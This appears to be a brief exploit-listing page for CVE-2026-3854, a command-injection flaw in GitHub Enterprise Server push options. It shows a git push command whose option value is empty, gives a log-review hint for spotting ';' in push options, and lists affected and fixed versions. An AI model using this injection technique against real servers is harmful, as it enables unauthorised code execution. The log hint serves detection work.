Share
## https://sploitus.com/exploit?id=61DD2AD4-9EEB-5525-A9CB-BF5E6EAA355B
# Exploit_CVE-2026-3854

CVE-2026-3854 is a Remote Code Execution in GitHub.com and GitHub Enterprise Server

The vulnerability could be exploited by injecting commands into the git push command as follows : 

```
git push -o '' origin master
```

To review any exploitation of this vulnerability, we recommend that you review /var/log/github-audit.log for push operations containing ";" in push options.


Vulnerable Versions	:
GitHub Enterprise Server	<= 3.19.1	

Fixed Version : 
3.14.24, 3.15.19, 3.16.15, 3.17.12, 3.18.6 and 3.19.3